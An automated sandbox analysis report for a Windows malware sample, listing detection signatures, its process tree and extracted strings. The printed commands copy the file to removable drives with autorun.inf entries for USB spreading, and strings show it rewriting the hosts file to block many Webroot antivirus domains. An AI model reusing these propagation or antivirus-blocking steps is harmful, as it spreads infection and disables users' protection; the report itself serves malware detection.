Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IPrstVM17M.exe

Overview

General Information

Sample name:IPrstVM17M.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Analysis ID:1430905
MD5:a23b11e50c1f6fcdb42d3b2582524e2f
SHA1:8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
SHA256:3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Queries Google from non browser process on port 80
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • IPrstVM17M.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\IPrstVM17M.exe" MD5: A23B11E50C1F6FCDB42D3B2582524E2F)
    • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4856 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 5024 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6368 cmdline: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6788 cmdline: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 4788 cmdline: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", CommandLine: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\IPrstVM17M.exe", ParentImage: C:\Users\user\Desktop\IPrstVM17M.exe, ParentProcessId: 5812, ParentProcessName: IPrstVM17M.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe", ProcessId: 4856, ProcessName: cmd.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: IPrstVM17M.exeReversingLabs: Detection: 15%
Source: IPrstVM17M.exeVirustotal: Detection: 14%Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bin.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: IPrstVM17M.exeJoe Sandbox ML: detected
Source: IPrstVM17M.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: IPrstVM17M.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exeBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000000.1976400525.000000000020C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038499719.00000000033D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=bin.exe >> D:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo [autorun] > E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo open=bin.exe >> E:\autorun.inf
Source: IPrstVM17M.exe, 00000000.00000003.2038465410.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: copy /v /y "%s" D:\bin.exeecho [autorun] > D:\autorun.infecho open=bin.exe >> D:\autorun.infcopy /v /y "%s" E:\bin.exeecho [autorun] > E:\autorun.infecho open=bin.exe >> E:\autorun.infStarted blocking antiviruses...1.1.1.1 mail.webroot.comC:\Windows\System32\drivers\etc\hosts1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 technet.webroot.com1.1.1.1 cms.webroot.com1.1.1.1 partner.webroot.com1.1.1.1 lp-carbonite-sandbox.webroot.com1.1.1.1 smtp-co.webroot.com1.1.1.1 smtp-ca.webroot.com1.1.1.1 vdi.webroot.com1.1.1.1 es.webroot.com1.1.1.1 usmail.webroot.com1.1.1.1 sftp.webroot.com1.1.1.1 lyncdiscover.webroot.com1.1.1.1 fr.webroot.com1.1.1.1 it.webroot.com1.1.1.1 dnsptest.webroot.com1.1.1.1 bounce2.webroot.com1.1.1.1 provisioningdev1.webroot.com1.1.1.1 nl.webroot.com1.1.1.1 mobiletest.webroot.com1.1.1.1 support-nl.webroot.com1.1.1.1 support-es.webroot.com1.1.1.1 sip.webroot.com1.1.1.1 contentr.webroot.com1.1.1.1 childsafe.webroot.com1.1.1.1 spyware.webroot.com1.1.1.1 testvpn.webroot.com1.1.1.1 support-de.webroot.com1.1.1.1 support-au.webroot.com1.1.1.1 support-fr.webroot.com1.1.1.1 support-it.webroot.com1.1.1.1 extranet.webroot.com1.1.1.1 sso-tst.webroot.com1.1.1.1 uk.webroot.com1.1.1.1 bb.webroot.com1.1.1.1 ncmec.webroot.com1.1.1.1 stage.webroot.com1.1.1.1 provisioningtest2.webroot.com1.1.1.1 websrv-stg.webroot.com1.1.1.1 de.webroot.com1.1.1.1 computer-security.webroot.com1.1.1.1 reseller.webroot.com1.1.1.1 connectuk.webroot.com1.1.1.1 vpn.webroot.com1.1.1.1 outbound5.webroot.com1.1.1.1 outbound2.webroot.com1.1.1.1 outbound3.webroot.com1.1.1.1 provisioningtest5.webroot.com1.1.1.1 view.webroot.com1.1.1.1 provisioningdev.webroot.com1.1.1.1 mydata.webroot.com1.1.1.1 provisioningtest4.webroot.com1.1.1.1 sfdcstage.webroot.com1.1.1.1 provisioning.webroot.com1.1.1.1 channeledge.webroot.com1.1.1.1 www2.webroot.com1.1.1.1 provisioningtest3.webroot.com1.1.1.1 mx.webroot.com1.1.1.1 support-enterprise.webroot.com1.1.1.1 autodiscover.webroot.com1.1.1.1 ws.webroot.com1.1.1.1 owauk.webroot.com1.1.1.1 outbound1.webroot.com1.1.1.1 research.webroot.com1.1.1.1 access-tst.webroot.com1.1.1.1 vpnuk.webroot.com1.1.1.1 ws-stg.webroot.com1.1.1.1 outbound4.webroot.com1.1.1.1 provisioningdev2.webroot.com1.1.1.1 myproduct.webroot.com1.1.1.1 labs.webroot.com1.1.1.1 tunnelfe.webroot.com1.1.1.1 mailbox.webroot.com1.1.1.1 outbound.webroot.com1.1.1.1 access.webroot.com1.1.1.1 sfdctest6.webroot.com1.1.1.1 encrypt.webroot.com1.1.1.1 outbound6.webroot.com1.1.1.1 mirage.webroot.com1.1.1.1 provisioningtest1.webroot.com1.1.1.1 origin-stage.webroot.com1.1.1.1 outbound7.webroot.com1.1.1.1 provisioningdev4.webroot.com1.1.1.1 workspace.webroot.com1.1.1.1 email.webroot.com1.1.1.1 itpro.webroot.com1.1.1.1 webmail.webroot.com1.1.1.1 brightcloud.webroot.com1.1.1.1 outlook.webroot.com1.1.1.1 android.webroot.com1.1.1.1 bounce.webroot.com1.1.1.1 codingchallenge.webroot.com1.1.1.1 connect.webroot.com1.1.1
